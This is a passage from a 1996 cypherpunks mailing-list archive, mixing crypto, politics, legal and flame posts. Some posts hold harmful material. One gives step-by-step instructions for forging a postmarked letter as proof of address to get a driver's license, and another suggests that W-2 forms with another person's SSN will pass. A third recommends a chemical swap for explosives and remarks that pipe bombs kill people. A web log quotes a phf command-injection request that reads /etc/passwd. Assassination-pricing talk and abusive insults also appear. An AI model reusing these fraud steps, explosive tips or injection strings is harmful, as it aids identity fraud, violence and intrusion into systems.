Message-ID: <199609210227.VAA10007@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


Congradulations dlv@bwalk.dm.com!!!!

You have won an one way trip into my TWIT filter for your repeated FUCKHEAD post.

Goodbye and good riddance,

--
-----------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    WebExplorer & Java Enhanced!!!
Merlin Beta Test Site - WarpServer SMP Test Site

Author of PGPMR2 - PGP Front End for MR/2 Ice

Look for MR/2 Tips & Rexx Scripts
Get Work Place Shell for Windows!!
PGP & MR/2 the only way for secure e-mail.
                            
Finger whgiii@amaranth.com for PGP Key and other info
-----------------------------------------------------------
 
MR/2 Tag->The best way to accelerate Windows is at escape velocity.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sat, 21 Sep 1996 11:53:23 +0800
To: cypherpunks@toad.com
Subject: Re: OTP seed solution? - strong, tried before???
In-Reply-To: <842976406.25087.0@fatmans.demon.co.uk>
Message-ID: <Pine.LNX.3.95.960920210709.220A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 17 Sep 1996 paul@fatmans.demon.co.uk wrote:

> A very simple idea came to me today that I`m sure has been done 
> before and I wanted to find out if it has any problems I haven`t 
> seen:
> 
> A strong random generator (ie. a BBS) is seeded with a true random 
> seed (derived possibly from keyboard latency) and used each time a 
> message is send to create a message length randon string.
> 
> This string is XOR`d or added to the message creating a OTP.
> 
> The recipient has previously been sent a seed value for the generator 
> encrypted under say RSA and signed to prevent a man in the middle 
> attack.

That's the definition of a stream cipher.  BBS is rather slow and is dependant
on the difficulty of factoring large numbers.  Of course, if the keys are
distributed using RSA or Rabin, then the strength of the system depends on the
difficulty of factoring numbers anyway.  There are many stream ciphers that
are fast and secure.  I generally like to use a block cipher in CFB or OFB
mode rather than a stream cipher, but they are basically the same thing.

Mark
- -- 
PGP encrypted mail prefered.
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMkNA2CzIPc7jvyFpAQHeZAf/d6cdUZ0611N+9E5yTwLebrJtdMJJG0zo
jk1rujKQB/3+Faexrazw2hTjTdoidH/irSWrCSPlgdgPOO8kuwK5HSONlXD/gzK3
WP0lS5iiTHSg0Gfge/K2px4HJjl4gP/bsNkcdTDf5QuZHsJFQ1wKcBkuv5AVCuD8
wp3fGKBy2fD2HrAAbvmACHwzVYV99D6X7KIXkBUB8kvH4cBPGwe1dWH45uWtE5UW
UJRyxax2m31K7mJ5kcIEf/noQHikZVCBNx0ojlnMub2M+UZhenJvvoVMu/0AqF7g
1OCk7H7SEI5g9AzB/zboKh+6Zs5oII+lsIIdNZRz4xqyaNzmQUU/Lg==
=+n1m
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas B. Renner" <dougr@skypoint-gw.globelle.com>
Date: Sat, 21 Sep 1996 09:41:44 +0800
To: Jeremey Barrett <jeremey@veriweb.com>
Subject: Re: Paradox: NO OPPRESSION IN AMERICA
In-Reply-To: <Pine.BSI.3.93.960920135806.13801E-100000@descartes.veriweb.com>
Message-ID: <Pine.3.89.9609202137.B939-0100000@skypoint-gw.globelle.com>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 20 Sep 1996, Jeremey Barrett wrote:
> 
> Rubbish. If the government removes all liberties at once, that's 


If I went over your head, I apologize!
The point of a paradox such as this is to illustrate something which is 
OBVIOUSLY FALLACIOUS, so that we might learn from it.  The intention is 
to make us *think*.


-Doug





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: drose@AZStarNet.com (David M. Rose)
Date: Sat, 21 Sep 1996 17:04:12 +0800
To: cypherpunks@toad.com
Subject: Re: FCC's Hundt calls for univ service for Net, nixes iphone regs
Message-ID: <199609210704.AAA07745@web.azstarnet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 20 Sep 1996, Declan McCullagh wrote:
(in quoting Reed Hundt)

>"The investment to network our schools and libraries is so small and
>the payoff so large. Look at the math... Can it be that we have a 700
>billion-dollar-a-year information technology industry and yet we can't
>afford to give every teacher the tools we give every shipping clerk at
>Wal Mart? Or that we could afford to network every classroom by the
>beginning of the next century, but somehow we just neglected to do it?
>At the FCC we will vote next year on a new universal service funding
>mechanism... The challenge I'm talking about is to provide bandwidth
>and access to all Americans, but especially in kids in classrooms...
>
>[Note that the 'we" paying for the shipping clerk's network is a
>private corporation spending its own money. But the second "we" is the
>government spending netizens' money. Guess the FCC can't tell the
>difference. --Declan]

Correct. And if "we" fund universal service, then "we" don't want to see
anything on the Net about non-GAK crypto, the right to bear arms, freedom of
association, chemistry, non-clothed persons, taxes, etc. etc.  "We" feel
that many if not "all American, but especially kids in classrooms" would be
injured by these thoughts.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 22 Sep 1996 06:27:34 +0800
To: "Vladimir Z. Nuri" <tcmay@got.net (Timothy C. May)
Subject: Re: timmy waxes a widdle on AP
Message-ID: <199609211946.MAA27996@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 08:11 PM 9/17/96 -0700, Vladimir Z. Nuri wrote:
> but I'm still a bit confused about those prices. what determines
> them, anyway? risk to the assassin? it seems that it ought to be
> as easy to snuff out one person as it would another. e.g. everybody
> walks alone out at night at different times, it seems.

Although government services to the rich and poor cost about 
the same, the quality is radically different.  Thus the risk
involved in killing a poor person is vastly less than the 
risk involved in killing a middle class person.

This is most noticeable in education, where black children
are kept in holding pens with leaky roofs, masquerading as 
schools, for a cost that would suffice to build classrooms 
with a hot tub in each classroom and a pentium on every desk, 
even if we burnt the classroom down with the equipment inside 
every year and and replaced it every year.

On the other hand, food, clothing, and transport, being
provided for money by the free market, tend to be roughly 
equal for rich and poor.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 22 Sep 1996 06:36:09 +0800
To: Rick Osborne <cypherpunks@toad.com
Subject: Re: Quantum Computers
Message-ID: <199609211946.MAA28008@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 05:09 AM 9/18/96 -0400, Rick Osborne wrote:
> I'm sorry if I seem to be making light of a very serious topic, but, last
> time I checked, computers don't have a reverse. 

Quantum computers *do* have a reverse.

Indeed even when operated in classical mode they *still* have 
a reverse.

A quantum computer is a reversible computer operated at very
high speed and very low energy.

Reversible computers were invented before quantum computers.

Reversible computer were invented in order to demonstrate that
there was no lower limit to the energy required to perform
certain computational tasks.

Later people speculated, and very recently demonstrated that 
a reversible computer operated in the quantum regime could 
do things that no classical computer could do.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sat, 21 Sep 1996 12:48:25 +0800
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: His Eminence, the Esteemably Dishonourable Dr.Dimitri Vulis KOTM
In-Reply-To: <Rk9JuD1w165w@bwalk.dm.com>
Message-ID: <199609210232.UAA25627@InfoWest.COM>
MIME-Version: 1.0
Content-Type: text/plain


Sorry, dear, but complaining isn't going to change it, and simple
telling people to shut the fuck up is going to go nowhere.

    His Eminence, the Esteemably Dishonourable Dr.Dimitri Vulis KOTM:

        ah, but you, sir, are childish.

        apparently even reminding you of the threads which bind
    the human existence into something more than the sweat of the
    jungle, at least among the "supposedly" educated, is wasted.

        the concept of the very existence of other inhabitants is a
    fact which seems to escape your restrained consciousness and
    cerebeal ruminations.

        your moral fiber must be limited by the vicarious thrill of
    the predator, a man(?) who neither shows nor grants either
    compassion or mercy, spewing only banal swill.

        but, if such unconscious viciousness was to be directed to
    your greed lined nest, the sounds of a ferel swine meeting the
    abatatoir would emanate from the stench.

If you
want solely crypto relevent material, subscribe to the filtered list.
I mean, come on -- you know this list is suseptable (sp?) to noise and
spam.

        this list is alve, but it does not come with persistent
    scurilous personal attacks against fellow subscribers.

        those are added by a few individuals, such as you seem wont
    to be,  whose minds never matriculated to the nursery, forever
    restained in their toilet training graduation ritual; the
proverbial
    rotten apple in the barrel.

Besides, people suggest to me that you are the anonymous mailer.  So
maybe you should keep a low profile on this.

        I never have need to post criticism or sarcasm anonymously.
    I would prefer to do so face to face --standing on your toes.

        --attila, just attila, Mr. Nobody...

--
  Lady:  "Sir Winston!  You are appallingly drunk!"
  Churchill: "lady, you are ugly; but I shall be sober in the
morning."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 21 Sep 1996 16:21:28 +0800
To: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Insider Trading - news report
In-Reply-To: <01I9O2JCWXMK8Y4ZFQ@mbcl.rutgers.edu>
Message-ID: <Pine.SUN.3.94.960920141029.24074E-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 19 Sep 1996, E. Allen Smith wrote:

> 	I'd be curious as to the comments of Black Unicorn and others on
> that legal finding - it does appear to make things at least a bit better
> in this area... including making it difficult to claim that insider
> information shouldn't be transmitted on the Net. Incidentally, I find
> AP's calling insider trading "fraud" rather biased.
> 	-Allen
> 
> >     _________________________________________________________________
> >   Direct Media
> >     _________________________________________________________________
> >                        INSIDER TRADING NEVER WENT AWAY
> >   __________________________________________________________________________
> >      Copyright &copy 1996 Nando.net
> >      Copyright &copy 1996 The Associated Press
>       
> >   WASHINGTON (Sep 18, 1996 10:35 a.m. EDT) -- One of the most infamous
> >   acts in the financial fraudster's playbook, insider trading, remains
> >   at record levels, despite a decade of steady crackdowns by regulators.

This is a classic effect of a black market economy for which there is
great demand, i.e., that regulation can only change the rules, not stop
the conduct.

>    
> [...]
> 
> >   The SEC brought one of its more unusual insider trading cases on
> >   Monday, when it sued the unnamed account holders in a Swiss and
> >   Bahamian accounts with insider trading ahead of The Gillette Co.'s
> >   merger proposal for Duracell International.

I'm not sure why this is unusual.  This is all the SEC can do when there
are secret accounts used.

Prediction: The holders of the Swiss accounts will be before a grand jury
in 9 months or less.  The holders of Bahamian accounts, should they be
distinct from the former group, will never be found.  (Switzerland shares
information with the United States in cases like this with alarming
frequency, and often Swiss banks get waivers from clients who wish to
trade with Swiss accounts.  These waivers release the bank from liability
for cooperating with investigations involving such trades.

> [...]
> 
> >   One disturbing development for regulators is a recent decision by the
> >   8th U.S. Circuit Court of Appeals that struck down one of the SEC's
> >   main enforcement tools in insider trading cases.
>    
> >   The court, which covers several Midwestern states, rejected the
> >   so-called "misappropriation theory" in insider trading cases, which is
> >   used to nab people trading on inside information who don't owe a
> >   fiduciary duty to the company's shareholders. The court also rejected
> >   an SEC rule used to snare insider trading in tender offers.

I'm pleased at this decision.  Misappropriation theory was designed by
creative prosecutors to solve a specific problem.  i.e., if Joe, employee
of Company X, tells Dave about an impending merger which Dave then trades
on, what fraud has Dave committed and against whom?  Dave is not an
"Insider" of company X, and thus had no strict Duty to the company.

As prosecutions relied on sections 10-b and 10-b(5) of the Securities
Exchange Act of 1934, they were required to show fraud to make their case.

"It shall be unlawful for any person, directly or indirectly, by any means
or instrumentality of interstate commerce, or of the mails, or of any
facility of any nation securities exchange,

(1) to employ any device, scheme, or artifice to defraud,

[...]

(3) to engage in any act, practice, or course of business which operates
or would operate as a fraud or deceit upon any person,

in connection with the purchase or sale of any security."

(Rule 10b-5)

The misappropriation theory was largely intended to extend the reach of
courts to cover individuals who do not fall within the traditionally
prosecuted areas (the insider and the tipee [he who gets the tip] were
always the easiest to nail).  Consider the comments of Professor Barbara
Aldave (a regular commentator on insider trading):  "Without the aid of
the misappropriation theory, section 10(b) and rule 10b-5 would lose much
of their efficacy as weapons against insider trading on nonpublic
information since they would no longer extend to trading by 'outsiders.'"

The theory which founded insider trading law before the dawn of
misappropriation was the so called "disclose or abstain" rule.  i.e., if
you had material nonpublic information by reason of your employment you
had a choice.  You could disclose that information and then trade on it,
or abstain from trading.  (Chiarella and Dirks estlablished this line of
thinking)

Again, courts have been forced to use the concept of fraud in connection
with "the purchase or sale of securities" to find liability.  When judges
saw what they considered illegal behavior by outsiders, the
misappropriation theory (that the information had been misappropriated and
that therefore the fraud needed to find liability could be found as
between the outside trader and the company) provided an easy out for
liability.  It was, in my view, a stretch to begin with.

See Generally, Barbara Bader Aldave, The Misappropriateion Theory:
Carpenter and Its Aftermath, 49 Ohio St. L. J. 373 (1988).

> >   The 8th Circuit decision came in August in a Justice Department case
> >   against Minneapolis attorney James H. O'Hagan, who was charged with
> >   insider trading during the 1988 takeover bid of Pillsbury Co. by Grand
> >   Metropolitan PLC. SEC General Counsel Richard Walker has asked the
> >   appeals court for a rehearing on the matter.
>    
> >   While the 8th Circuit decision represents a setback for the SEC, the
> >   agency usually brings its cases in the New York and Chicago areas,
> >   where the federal courts acknowledge these insider trading rules.

What is not mentioned here is that the 4th Circiut recently made a similar
decision.

> >   Regulators say these enforcement tools are important because insider
> >   trading follows few patterns. In an analysis of 35 cases brought in
> >   1995 that solely dealt with insider trading, Gerlach said 20 involved
> >   trading ahead of mergers, three ahead of other positive corporate
> >   announcements and six ahead of bad corporate news.

Who cares if there's a pattern?  Notice no one here has bothered to try
and make the argument that insider trading harms anyone.


Now that the 8th and the 4th Circuits are in conflict with the remainder
it is likely that we will soon see a Supreme Court case on the topic.

It should be noted that in one of the decisions, (I can't recall which at
the moment) the insider trading charges were dismissed, but related wire
and mail fraud charges stood.  Wire and mail fraud have always, in my
view, represented a superior means to prosecute insider trading because
they force the prosecution to point to fraud with much more clarity than
modern 10b and 10b-5 theory required.

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 21 Sep 1996 16:40:15 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: DL in exchange for fingerprint
In-Reply-To: <ae67137f030210047b42@[207.167.93.63]>
Message-ID: <Pine.SUN.3.94.960921021401.2717A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 19 Sep 1996, Timothy C. May wrote:

> At 9:13 PM 9/19/96, Gary Howland wrote:
> >Timothy C. May wrote:
> >>
> >> (Yes, I disliked being thumb-printed, but I could see no viable
> >> alternative. I'm sure Duncan has some scheme to declare himself a Botswanan
> >> exchange student, but I decided being thumb-printed was the lesser hassle.)
> >
> >Sure, it's always less hassle doing what they want.  Privacy doesn't
> >come for free.  It's easier to let the police search you in the street
> >than it is to make them arrest you so that you can make a formal
> >complaint.
> 
> So, just what it is _your_ method of dealing with this? While it is noble
> to talk about fighting the system, just how do you go about doing it
> yourself?

Forum shopping.

Not that I would encourage you to break the law, but this method appears
to work quite well.

Get P.O. Box in state which issues DL's on the spot w/o fingerprinting.
Write yourself a letter in very light pencil to this P.O. box.
Get postmarked letter and erase the address.
Replace address with address of local sports stadium or empty lot in pen
complete with return address.

This letter is often accepted as proof of address and residence.
Use the rest of your documents as normal to obtain driver's license in the
state of your choice.

> Do you simply drive without a valid driver's license? I know some folks who
> do, of course, but it's not something that's "worth it" to me.

Some jurisdictions (D.C. is a good example) are such a joke it's not
funny.  An associate of mine literally MADE his own Italian Driver's
license and turned it in, took an eye test, and walked out with a nice new
D.C. license.

Who the hell knows what an italian license looks like?

> (This space reserved for your lecture about how I need to be prepared to go
> to jail to defend my right not to be thumbprinted, etc. On second thought,
> why don't you be the one to go to jail, and then you can let us know your
> experiences.)

I was once standing in line at a DMV where some schmuck was clearly trying
to work his way past the "guardian" with bogus documents.
They just shook their head, despite his repeated protests.  No one has the
time to muck around with cops in there.

Even if they did, you are just getting a license with a bogus address, not
a bogus name or anything.  It's a pretty hard case to make.

Point being that it does require effort, but it also pays off.  (For seven
years in the right jurisdictions).

[...]

> --Tim May
> 
> We got computers, we're tapping phone lines, I know that that ain't allowed.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."
> 
> 
> 
> 
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 21 Sep 1996 16:44:18 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: HipCrime as MetaSPAM
In-Reply-To: <199609200603.XAA01570@dns1.noc.best.net>
Message-ID: <Pine.SUN.3.94.960921023132.2717D-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 19 Sep 1996, James A. Donald wrote:

> At 02:10 AM 9/15/96 -0700, Bill Stewart wrote:
> >5) "Anarchist Info" - sigh.  Where do people get the idea that publishing
> >recipes for drugs and explosives is anarchist info?  He didn't talk 
> >about anarchy, or getting along without governments, or getting rid of them.
> >Also, he neglects to note that you can simply _buy_ potassium chlorate,
> >rather than having to (dangerously) boil down bleach and potassium chloride
> 
> 
> In addition:  Potassium chlorate based explosives are not particularly
> safe or reliable, but worse than that, much worse, because of their
> relatively slow detonation rate, they are very ineffectual for smashing
> stuff and killing people,


Potassium chlorate makes a very shock sensitive explosive.
Use potassium permaganate instead.

Pipebombs are not much good for smashing stuff, but they do kill people.

(They deflagrate, not detonate, BTW)

>  ---------------------------------------------------------------------
>               				|  
> We have the right to defend ourselves	|   http://www.jim.com/jamesd/
> and our property, because of the kind	|  
> of animals that we are. True law	|   James A. Donald
> derives from this right, not from the	|  
> arbitrary power of the state.		|   jamesd@echeque.com
> 
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skeeve@skeeve.net (Skeeve Stevens)
Date: Sat, 21 Sep 1996 04:02:43 +0800
To: cypherpunks@toad.com
Subject: Go away CIA
Message-ID: <199609201646.CAA00999@myinternet.myinternet.net>
MIME-Version: 1.0
Content-Type: text/plain




Well well...

After putting up the CIA hack mirror page on http://www.skeeve.net/cia/
I learnt a few things.

o it got 50,000 hits in 1 day
o everyone from the cia, senate, fbi, nsa (ncsc) and every other bloody US gov
  department looked at it masses of times. The CIA looked at it every 10-15
  minutes.
zztop{root}:15: cat skeeve.net-access_log | grep ucia.gov | wc -l
    281

o Even the CIA tries to hack you.  

relay1-ext.ucia.gov unknown - [21/Sep/1996:01:56:44 +1000] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 1180

o Dozens of in.fingerd/in.telnetd attempts from ucia.gov, some mil sites and
  ncsc.mil sites.

as I speak the house are looking at it.
b252-209.house.gov unknown - [21/Sep/1996:02:41:37 +1000] "GET /cia/


I "PRESUME" there are no laws (international or otherwise) being broken by
my housing of the mirror... not like I actually care.. but it would be good
to know.

Ok... ive been up all night chuckling at all the different sort of sites hitting
the mirror... time to sleep.


--------------------------------------------------------------------
Skeeve Stevens                              Email: skeeve@skeeve.net
CEO/The Big Boss/All round nice guy      URL: http://www.skeeve.net/
MyInternet                               Australian Anglicans Online
http://www.myinternet.net/               http://www.anglican.asn.au/
Phone: (+612) 869-3334        Mobile: (0414) SKEEVE [+61414-753-383]
Key fingerprint  =  D2 7E 91 53 19 FE D0 5C  DE 34 EA AF 7A 5C 4D 3E




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 21 Sep 1996 16:49:17 +0800
To: Kurt Vile <burris@apdg.com>
Subject: Re: DL in exchange for fingerprint
In-Reply-To: <199609201528.KAA13170@apdg.com>
Message-ID: <Pine.SUN.3.94.960921024503.2717F-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 20 Sep 1996, Kurt Vile wrote:

> 
> >By the way, the next rev of the California driver's license will
> >reportedly have one's *Social Security Number* printed on the card!
> >So much for the statement clearly printed on my card:
> 
> Illinois already has such a law, in fact you must have an SSN to  
> even get a DL.

False.

You must present a SSN card or a "suitable substitute."

A w2 form with a (not necessarily YOUR) SSN is sufficent.  Note that not
all w2's actually HAVE your SSN because in some cases the Taxpayer
Identification number is distinct from the SSN.

I might add that standard w2 forms are available about anywhere.
They are also generally filled out by typewriter.

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@Cor.sos.sll.se>
Date: Sat, 21 Sep 1996 11:57:45 +0800
To: cypherpunks@toad.com
Subject: Re: Go away CIA
In-Reply-To: <199609201646.CAA00999@myinternet.myinternet.net>
Message-ID: <Pine.HPP.3.91.960921025046.2052A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 21 Sep 1996, Skeeve Stevens wrote:

> After putting up the CIA hack mirror page on http://www.skeeve.net/cia/
> I learnt a few things.

Interesting.

Some background, from Dagens Nyheter (biggest morning paper
in Sweden) 09/20/96, by Anna-Maria Hagerfors:

(free translation]
**************************************************************
They call themselves Mr Big, Zaphod, Lixon, Bah and Nimh.
They are Swedish hackers presently prosecuted at the Stocholm
(low) court for, among other things, computer intrusion,
corporate espionage and fraud. Swedes associated with the
group (Swedish Hacker Association) have broken into CIA's
homepage on the Internet for protesting against the trial.
...
...telling the Swedish prosecutor: Stop lying, Bo Skarinder!
...
Those prosecuted at the Stockholm court are suspected of
computer intrusion at Telia (big Swedish telco), Holmens
Bruk (big Swedish corporation), KTH (University of Stockholm's
engineering division) and AT&T. The oldest of the prosecuted,
Mr Big, 29 yo, is believed to be the leader of the Swedish
Hacker Association. He's working as a security consultant for
a traveler check company and a dept collection service.
... Mr Big has applied for a job at SAPO (Swedish FBI) and
Forsvarets Radioanstalt (Swedish NSA).
...
***************************************************************


Asgaard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 22 Sep 1996 07:51:08 +0800
To: cypherpunks@toad.com
Subject: Re: "Remailers can't afford to be choosy"
Message-ID: <ae69af120002100432e8@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



Without going back and reviewing my precise words in my first post on this
topic, I don't think Lance is doing anything unreasonable. My comment was
more to the point that a lot of the talk I see about filtering topics,
looking at content, blah blah blah, is basically inconsistent with the
basic concept of a "digital mix," a la Chaum.

At 7:19 PM 9/21/96, Lance Cottrell wrote:
>One important differentiation to make is filtering on form vs. filtering on
>content. Most if not all remailers have clear usage guidelines. These
>indicate several form restrictions on what messages the remailer is
>offering to transmit. These restrictions may be on message size,
>instruction formatting, number of destinations for one message, or number
>of identical messages. These restrictions are no more censorship than
>restricting messages to SMTP compliant ascii.
>
>Where people do not follow the stated rules, I take action to enforce them.
>Either by source blocking the abuser if known, destination blocking the
>destination, or trying to apply public pressure. I think all these actions
>are completely reasonable, given that the proper use guidelines were
>clearly defined up front. It is similar to putting up a fence around your
>yard when people start hanging out there uninvited.

Clearly stating policies is fair enough. In the future, with a rich ecology
of remailers, I would expect many kinds of remailers with many kinds of
policies, prices, etc. Still, it is always useful to remember that a
remailer is first and foremost a _remailer_, not an inspector of content to
determine appropriateness of topics, whether a receiver "wants" a remailed
message, etc. (None of the main "physical remailers," e.g., the US Postal
Service, Federal Express, UPS, Airborne, etc., offer "destination-blocking"
or even "source-blocking" services. Of course, they charge some form of fee
for remailing. And there is nominally a return address (albeit easily
bypassed/spoofed).)


>Are you suggesting that I not take perfectly legal and open actions to
>enforce the public statement of allowed uses of my remailer?

No. I think clearly stated policies are perfectly legit. What I was getting
at with my "remailers can't afford to be choosy" point was a more general
point that sometimes seems to get lost in the discussions, namely, that
remailers will, perforce, be used for lots of unpopular, disgusting,
flamish, etc. uses. Not all remailer uses are noble whisteblowings (*).

(* In fact, some whistleblowings are amongst the most "most illegal" uses!
The person within General Dynamics who uses a remailer to describe contract
fraud in the Tomahawk Cruise Missile program is almost certainly putting
the remailer operator under intense pressure, just as is a person using a
remailer to post the Church of Scientology NOTS documents. To me, they are
the same. Hence, "remailers can't afford to be choosy.")

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Sun, 22 Sep 1996 02:04:27 +0800
To: cypherpunks@toad.com
Subject: Private Idaho 2.8b beta release
Message-ID: <3.0b19.32.19960921074732.00b95ad0@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


The beta release of Private Idaho 2.8b is now available at
http://www.eskimo.com/~joelm/pi.html.  (Previous beta testers can get an
updated version of just the executable at
http://www.eskimo.com/~joelm/pi_list.html)

Private Idaho is a freeware PGP, anonymous remailer, and nym server
front-end for Windows (all versions).

Some of the new features in the latest release include:
------------------
Automatic encrypt/decrypt of PIDAHO.INI, NYMS.TXT, PUBKEYS.OUT
Automatic encrypt/decrypt of SECRING.PGP and PUBRING.PGP
nym.alias.net support
Generate key pair command
Load passphrase at startup
Submit key to MIT server command
Get key from MIT server command (must have Net connection)
Update remailer info command (must have Net connection)
Get remailer keys command (must be have Net connection)
Remailer newsgroup header command
Delete nym command
Attachment support

Bug reports, comments, and questions, as always to:

joelm@eskimo.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 21 Sep 1996 22:16:36 +0800
To: cypherpunks@toad.com
Subject: Re: DL in exchange for fingerprint
In-Reply-To: <Pine.SUN.3.94.960921021401.2717A-100000@polaris>
Message-ID: <awTLuD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn <unicorn@schloss.li> writes:
> > Do you simply drive without a valid driver's license? I know some folks who
> > do, of course, but it's not something that's "worth it" to me.
>
> Some jurisdictions (D.C. is a good example) are such a joke it's not
> funny.  An associate of mine literally MADE his own Italian Driver's
> license and turned it in, took an eye test, and walked out with a nice new
> D.C. license.

In NYC a very high percentage of drivers don't have licences, have suspended
licences, etc. Generally no one has the time to bother with them unless they
want to nail them for something else. A couple of years ago we were involved in
a minor car accident with a Chassidic Jew who tried to leave the scene of the
accident. My wife chased him and stopped him. :-) The cops came and discovered
that he had no papers (including no driver's licence, no insurance, etc). They
gave him about $500 worth of tickets for driving without a licence, leaving the
scene of an accident, etc (which I rather doubt he was planning to pay) and let
him drive on (still without the licence).

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 21 Sep 1996 22:34:41 +0800
To: cypherpunks@toad.com
Subject: RE: Fuckhead
In-Reply-To: <199609210227.VAA10007@mailhub.amaranth.com>
Message-ID: <wTuLuD5w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"William H. Geiger III" <whgiii@amaranth.com> writes:

> Congradulations dlv@bwalk.dm.com!!!!
>
> You have won an one way trip into my TWIT filter for your repeated FUCKHEAD post.
                                                       ^^^^
You are confused. The 'fuckhead' posts (quoting my entire wire clippings and
adding the word 'fuckhead' at the end) are not mine. They are sent to me by
Timmy May's friends. I just forward them to this mailing list. I believe
they're at least as relevant as Timmy May's political rants.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 22 Sep 1996 08:24:58 +0800
To: cypherpunks@toad.com
Subject: Death Threats
Message-ID: <ae69ba1d01021004cb52@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



(I don't know what the hell this thread has to do with "[NOISE] Kiddie porn
on the Internet," so I've changed the name.)

At 9:22 PM 9/21/96, Mark M. wrote:

>Do you really consider speech to be "dangerous."  The law requiring
>investigation of threats against the president is a stupid one.  The maintainer
>of the exploding head page was investigated by the USSS after putting up
>computer-generated pictures of Bob Dole's head exploding (Presidential
>candidates are also covered under this law).  There's too much potential for
>abuse.

Hey, I'm a candidate for President, too (at least I know of someone who
plans to vote for me). Does this mean I am protected against various
threats, and veiled threats? Let me know, as I seem to be under attack by
certain Russian-developed spambots.

More seriously, the whole set of protections the President has is
inconsistent with our nominally anti-royalist approach. Of course, America
long ago created its own royalty. Even dynasties (how else do you explain
